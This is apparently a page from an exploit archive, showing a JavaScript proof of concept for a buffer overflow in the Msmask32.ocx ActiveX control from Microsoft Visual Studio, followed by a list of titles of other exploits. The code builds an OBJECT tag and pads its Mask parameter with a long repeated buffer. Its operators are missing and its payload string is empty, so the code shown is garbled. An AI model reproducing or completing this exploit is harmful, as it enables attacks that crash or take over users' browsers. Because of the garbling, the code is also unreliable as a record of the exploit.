var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC"
width="10"><PARAM NAME="Mask" VALUE="';
var body1='"></OBJECT>';
var buf='';
for (i=1;i<=1945;i ){buf=buf unescape("");}
document.write(body buf body1);
【Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC】相关文章:
★ WebCMS Portal Edition (id) Remote SQL Injection Vulnerability
★ MojoClassifieds 2.0 Remote Blind SQL Injection Exploit
★ Yahoo Messenger 8.1 ActiveX Remote Denial of Service Exploit
★ BurnAware NMSDVDXU ActiveX Remote Arbitrary File Creation/Execution
★ Rianxosencabos CMS 0.9 Remote Add Admin Exploit
★ Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit
★ Microsoft Excel Malformed Palette Record DoS PoC (MS07-002)
★ Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit
★ ITechBids 7.0 Gold (XSS/SQL) Multiple Remote Vulnerabilities
★ PPMate PPMedia Class ActiveX Control Buffer Overflow PoC